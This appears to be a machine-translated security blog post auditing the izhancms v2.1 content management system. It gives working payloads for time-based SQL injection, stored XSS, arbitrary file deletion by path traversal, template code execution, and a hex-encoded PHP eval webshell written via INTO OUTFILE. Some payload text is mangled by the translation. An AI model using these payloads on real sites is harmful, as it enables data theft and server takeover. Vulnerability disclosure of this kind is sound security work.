IMCAFS

Home

v2.1 vulnerability analysis

Posted by barello at 2020-03-01
all

Love station CMS is an open source free CMS content management system, with open and flexible, safe and efficient, simple and beautiful! This time, we conducted code audit for izhancms? V2.1, and found the security vulnerability in the code.

Official website of izhancms: http://www.izhancms.com

Website source code version: love station CMS (zend6.0) v2.1

Source code download: http://www.izhancms.com/category/category/index/cid/1

Default background address: http://127.0.0.1/admin/admin/index

Default account password: at least six self setting admin passwords

Code analysis:

Vulnerability file location: line 89-102 of application / index / Controllers / indexcontroller.php:

The parameter ID obtained in this function is not protected by single quotation marks. It is spliced into SQL statements and then brought into the database for execution. As a result, there is a SQL injection vulnerability in the implementation of the program, which can be used by attackers to obtain database sensitive information

Interest.

Exploit:

According to the location of the vulnerability, a time blind injection payload is constructed: http://127.0.0.1/index/index/qrcodepreview? Id = 2 / * * / XOR / * * / if (substring (user(), 1,1) ='2 ', sleep (5,0) -- database data can be obtained directly using sqlmap:

Code analysis:

Vulnerability file location: line 68-96 of application / goods / Controllers / goodscontroller.php

In this function, the obtained parameter ID will be brought into the getlinkgoodsid function to query. Pay attention to the third circle

Where the parameter ID is spliced into the SQL statement, and then brought into the database for execution, there are SQL notes in this place

Enter. Let's follow up the getlinkgoodsid function:

Vulnerability file location: line 91-109 of application / goods / Models / goodsmodel.php:

The parameter ID obtained in this function is also spliced into the SQL statement, and then carried into the database for execution.

To sum up, there are two SQL statements splicing in parameter ID, which leads to SQL injection vulnerability in the implementation of the program. The attacker can use this vulnerability to obtain database sensitive information.

Exploit:

According to the location of the vulnerability, a time blind injection payload is constructed

http://127.0.0.1/goods/Goods/info?id=2 xor if('2'='2',sleep(5),0)--

You can run directly with sqlmap:

Too simple, code analysis is skipped.

Exploit:

Website front desk -- comments and Suggestions -- commenter -- submit payload: 222 < script > alert (/ XSS /) < script >

When the administrator views the message information in the background, JS script code will be triggered.

Code analysis:

Vulnerability file location 1: admin / application / extensions / Controllers / qrcodecontroller.php

Lines 235-246:

The parameter ID obtained in this function is spliced into SQL statement, and then brought into database for execution. There is SQL injection in this place.

Vulnerability file location 2: admin / application / webset / Controllers / managerlogcontroller.php

Lines 33-57:

Vulnerability file location 3: admin / application / webset / Controllers / adminusercontroller.php

Lines 37-69:

In this function, the obtained parameter keyword is also spliced into SQL statements without any filtering, and then brought into the database for execution, resulting in a SQL injection vulnerability in the implementation of the program, which can be used by attackers to obtain database sensitive information.

A similar situation exists for all search boxes in the basic background.

Exploit:

Vulnerability location 1: http://127.0.0.1/admin/extensions/qrcode/preview? Id = 2

You can run directly with sqlmap:

Location 2: log in to the background system settings log management search keyword

Location 3: log in to the background - permission setting - system administrator - Search - Keyword

There are almost the same problems in the background search box, so we will not verify them one by one.

Code analysis:

Vulnerability file location: admin / application / webset / Controllers / dbrecovercontroller.php

Follow up deletetable function:

Vulnerability file location: admin / application / webset / Models / tablemodel.php

In this function, get $save ﹣ path, process it, and then directly bring $filen ﹣ path into the delete function to execute, which leads to arbitrary file delete vulnerability in the implementation of the program, which can be used by attackers to delete arbitrary files.

Exploit:

Create test.txt in the root directory as a vulnerability test file

Log in to the background, submit the payload, and delete the test.txt file in the root directory

Payload:http://127.0.0.1/admin/webset/dbrecover/delete?tbname=../../../test.txt

Method 1: modify label file

Log in to the background - Template Management - label management - label list - modify tag.lib.php:

Payload:phpinfo();

Visit http://127.0.0.1/library/mainone/taglib/tags.lib.php to successfully trigger code execution vulnerability.

Mode 2: write webshell with SQL statement

Login background - system settings - database operation - SQL statement - execute SQL statement.

Problem: the input characters will be HTML entity encoded, so the traditional into outfile statement cannot be successfully written

file

Select '< PHP Eval ($_post [CMD]);? >' into outfile 'C: / www / 222aaa. PHP' write failed

Convert a sentence into hex code, and construct pyaload as follows:

SELECT  111222 INTO OUTFILE 'E:/study/WWW/iZhanCMS/2222.php'  LINES

TERMINATED BY  0x3C3F70687020406576616C28245F504F53545B2761275D293B3F3E –

Write webshell successfully, control website server

This is a case of black box combined with white box, which is relatively comprehensive. There are children's shoes with research in this area. Welcome to discuss and exchange with each other.

Bypass

About Me

A network security enthusiast has a paranoid pursuit of technology. Committed to sharing original high-quality dry goods, including but not limited to: penetration testing, WAF bypass, code audit, security operation and maintenance.